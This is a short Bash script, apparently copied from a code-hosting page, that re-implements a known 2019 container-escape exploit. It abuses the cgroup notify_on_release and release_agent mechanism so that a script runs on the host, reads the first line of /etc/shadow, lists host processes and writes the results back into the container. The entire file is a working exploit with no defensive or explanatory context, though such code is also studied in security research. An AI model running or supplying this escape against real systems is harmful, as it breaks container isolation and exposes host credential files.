17 lines
549 B
Bash
17 lines
549 B
Bash
#!/bin/bash
|
|
# This is a re-write of Felix Wilhelms exploit from 2019.
|
|
# The original Tweet (and code) can be found at:
|
|
# https://twitter.com/_fel1x/status/1151487051986087936
|
|
rdma=/sys/fs/cgroup/rdma
|
|
mkdir -p $rdma/w
|
|
echo 1 >$rdma/w/notify_on_release
|
|
upperdir=`sed -rn 's/.*upperdir=([^,]*).*/\1/p' /etc/mtab`
|
|
echo $upperdir/cmd > $rdma/release_agent
|
|
echo '#!/bin/sh' > /cmd;
|
|
echo "head -n 1 /etc/shadow > $upperdir/utdata" >> /cmd
|
|
echo "ps >> $upperdir/utdata" >> /cmd
|
|
chmod +x /cmd
|
|
/bin/bash -c "echo 0 > $rdma/w/cgroup.procs"
|
|
sleep 3
|
|
cat /utdata
|